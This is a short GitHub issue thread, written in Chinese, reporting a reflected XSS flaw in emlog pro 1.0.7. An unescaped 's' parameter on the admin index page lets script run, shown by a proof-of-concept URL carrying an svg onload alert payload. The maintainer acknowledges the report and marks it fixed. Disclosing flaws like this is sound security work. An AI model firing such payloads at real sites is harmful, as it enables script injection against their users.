### ISSUE TITLE
emlog pro-1.0.7  has XSS Vulnerability

### ISSUE THREAD

**Issue by mku16** [emlog/emlog#113]
在用户没有配置ADMIN_PATH_CODE且未登陆后台的情况下，由于s参数没有转义特殊字符，会导致xss漏洞。

```
http://127.0.0.1/admin/index.php?s=%27%22()%26%25%3Cacx%3E%3Csvg/onload=alert(1)%3E
```

![123](https://user-images.githubusercontent.com/70473880/141449781-9dde70e8-665e-430e-a987-3cfdc0ff02e4.png)

**Comment by emlog** [comment]
收到，感谢反馈。

**Comment by emlog** [comment]
fixed
